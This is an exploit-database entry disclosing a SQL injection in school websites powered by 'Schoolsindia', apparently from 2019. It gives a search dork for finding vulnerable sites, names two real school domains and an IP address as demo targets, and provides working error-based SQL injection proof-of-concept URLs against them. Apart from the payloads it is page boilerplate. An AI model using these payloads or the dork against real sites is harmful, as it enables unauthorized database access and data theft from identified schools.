Delhi Jain Public School or Jinvani Bharati School SQL Injection

2019.05.19

Cerkuday (TR)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: intext:"Powered by Schoolsindia" download.php?id=5

# Exploit Title:Delhi Jain Public School or Jinvani Bharati School SQL Injection
# Date:17.05.2019
# Dork :intext:"Powered by Schoolsindia"  download.php?id=5
# Exploit Author:Cerkuday &Ergenekon
# Tested on:Windows &Kali Linux

reverse check  bing.com

ip:173.230.252.250 id=

#Demo

http://www.delhijainschool.com/gallery.php?id=15
https://jinvanischool.com/download.php?id=5

# Poc:

http://www.delhijainschool.com/gallery.php?id=15 AND EXTRACTVALUE(1634,CONCAT(0x5c,0x716a6a6b71,(SELECT (ELT(1634=1634,1))),0x71626a6b71))

http://jinvanischool.com/download.php?id=5 AND EXTRACTVALUE(4967,CONCAT(0x5c,0x7162707671,(SELECT (ELT(4967=4967,1))),0x716a786271))

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Delhi Jain Public School or Jinvani Bharati School SQL Injection

Dork: intext:"Powered by Schoolsindia" download.php?id=5

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.